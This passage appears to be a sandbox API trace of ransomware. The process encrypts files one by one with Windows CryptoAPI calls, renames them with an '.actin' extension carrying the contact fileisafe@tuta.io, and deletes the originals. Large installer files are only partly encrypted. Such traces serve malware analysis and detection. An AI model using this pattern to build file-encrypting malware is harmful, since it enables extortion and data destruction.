hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0049.101] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.101] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x37e, lpOverlapped=0x0) returned 1 [0049.102] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380, dwBufLen=0x380 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380) returned 1 [0049.102] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x380, lpOverlapped=0x0) returned 1 [0049.103] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0049.103] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.103] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.103] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0049.103] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.103] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0049.103] CloseHandle (hObject=0x340) returned 1 [0049.103] CloseHandle (hObject=0x314) returned 1 [0049.104] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate5.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate5.ico")) returned 1 [0049.105] SetEvent (hEvent=0x2e8) returned 1 [0049.105] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.105] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.105] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=894) returned 1 [0049.106] CloseHandle (hObject=0x314) returned 1 [0049.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 0x80 [0049.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.106] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.106] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.106] SetFilePointerEx (in: hFile=0x314, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.106] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.106] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b00) returned 1 [0049.106] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.106] ReadFile (in: hFile=0x314, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x37e, lpOverlapped=0x0) returned 1 [0049.108] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380, dwBufLen=0x380 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380) returned 1 [0049.108] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x380, lpOverlapped=0x0) returned 1 [0049.109] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e80) returned 1 [0049.109] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.109] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.109] CryptDestroyKey (hKey=0xf71e80) returned 1 [0049.109] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.109] CryptDestroyKey (hKey=0xf71b00) returned 1 [0049.109] CloseHandle (hObject=0x314) returned 1 [0049.109] CloseHandle (hObject=0x340) returned 1 [0049.109] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 1 [0049.110] SetEvent (hEvent=0x2e8) returned 1 [0049.110] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.110] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.110] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=894) returned 1 [0049.111] CloseHandle (hObject=0x340) returned 1 [0049.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 0x80 [0049.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.111] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.111] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.111] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.111] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0049.111] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0049.111] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.111] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x37e, lpOverlapped=0x0) returned 1 [0049.113] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380, dwBufLen=0x380 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380) returned 1 [0049.113] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x380, lpOverlapped=0x0) returned 1 [0049.114] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71b80) returned 1 [0049.114] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.114] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.114] CryptDestroyKey (hKey=0xf71b80) returned 1 [0049.114] WriteFile (in: hFile=0x314, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.114] CryptDestroyKey (hKey=0xf72100) returned 1 [0049.114] CloseHandle (hObject=0x340) returned 1 [0049.114] CloseHandle (hObject=0x314) returned 1 [0049.114] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate7.ico")) returned 1 [0049.115] SetEvent (hEvent=0x2e8) returned 1 [0049.115] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.115] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.116] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=894) returned 1 [0049.116] CloseHandle (hObject=0x340) returned 1 [0049.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 0x80 [0049.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.116] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.116] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.116] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.117] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0049.117] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d40) returned 1 [0049.117] CryptSetKeyParam (hKey=0xf71d40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.117] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x37e, lpOverlapped=0x0) returned 1 [0049.118] CryptEncrypt (in: hKey=0xf71d40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380, dwBufLen=0x380 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x380) returned 1 [0049.118] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x380, lpOverlapped=0x0) returned 1 [0049.119] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72040) returned 1 [0049.119] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.119] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.119] CryptDestroyKey (hKey=0xf72040) returned 1 [0049.119] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.119] CryptDestroyKey (hKey=0xf71d40) returned 1 [0049.119] CloseHandle (hObject=0x340) returned 1 [0049.119] CloseHandle (hObject=0x32c) returned 1 [0049.120] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate8.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate8.ico")) returned 1 [0049.132] SetEvent (hEvent=0x2e8) returned 1 [0049.132] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.133] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0049.133] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1150) returned 1 [0049.133] CloseHandle (hObject=0x32c) returned 1 [0049.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 0x80 [0049.133] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0049.133] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0049.133] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.133] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0049.133] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.133] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72180) returned 1 [0049.133] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.133] ReadFile (in: hFile=0x32c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x47e, lpOverlapped=0x0) returned 1 [0049.498] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x480, dwBufLen=0x480 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x480) returned 1 [0049.498] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x480, lpOverlapped=0x0) returned 1 [0049.499] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71fc0) returned 1 [0049.499] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.499] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0049.499] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0049.499] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0049.499] CryptDestroyKey (hKey=0xf72180) returned 1 [0049.499] CloseHandle (hObject=0x32c) returned 1 [0049.499] CloseHandle (hObject=0x340) returned 1 [0049.500] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Save.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\save.ico")) returned 1 [0049.501] SetEvent (hEvent=0x2e8) returned 1 [0049.501] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0049.501] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.502] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1901056) returned 1 [0049.502] CloseHandle (hObject=0x340) returned 1 [0049.502] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi")) returned 0x80 [0049.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0049.502] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x64.msi.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0049.503] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0049.503] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0049.503] ReadFile (in: hFile=0x340, lpBuffer=0x3e5c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e5c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0049.507] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0049.507] ReadFile (in: hFile=0x340, lpBuffer=0x3e9c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3e9c058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0049.512] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x38efa38 | out: lpNewFilePointer=0x0) returned 1 [0049.512] ReadFile (in: hFile=0x340, lpBuffer=0x3edc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38efa44, lpOverlapped=0x0 | out: lpBuffer=0x3edc058*, lpNumberOfBytesRead=0x38efa44*=0x40000, lpOverlapped=0x0) returned 1 [0049.518] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa94 | out: phKey=0x38efa94*=0xf720c0) returned 1 [0049.518] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0049.518] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa48*=0xc0060) returned 1 [0049.519] CryptDestroyKey (hKey=0xf720c0) returned 1 [0049.519] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa70 | out: lpNewFilePointer=0x0) returned 1 [0049.519] WriteFile (in: hFile=0x340, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x38efa80, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa80*=0xc0112, lpOverlapped=0x0) returned 1 [0049.766] SetEndOfFile (hFile=0x340) returned 1 [0049.766] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x190200, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0049.766] WriteFile (in: hFile=0x340, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0049.768] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x9ab55, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0049.768] WriteFile (in: hFile=0x340, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0049.770] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa40 | out: lpNewFilePointer=0x0) returned 1 [0049.770] WriteFile (in: hFile=0x340, lpBuffer=0x3f1c14a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38efa4c, lpOverlapped=0x0 | out: lpBuffer=0x3f1c14a*, lpNumberOfBytesWritten=0x38efa4c*=0x40000, lpOverlapped=0x0) returned 1 [0049.772] CloseHandle (hObject=0x340) returned 1 [0050.266] SetEvent (hEvent=0x2e8) returned 1 [0050.266] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0050.266] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0050.267] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=1163264) returned 1 [0050.267] CloseHandle (hObject=0x340) returned 1 [0050.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi")) returned 0x80 [0050.267] GetFileAttributesW 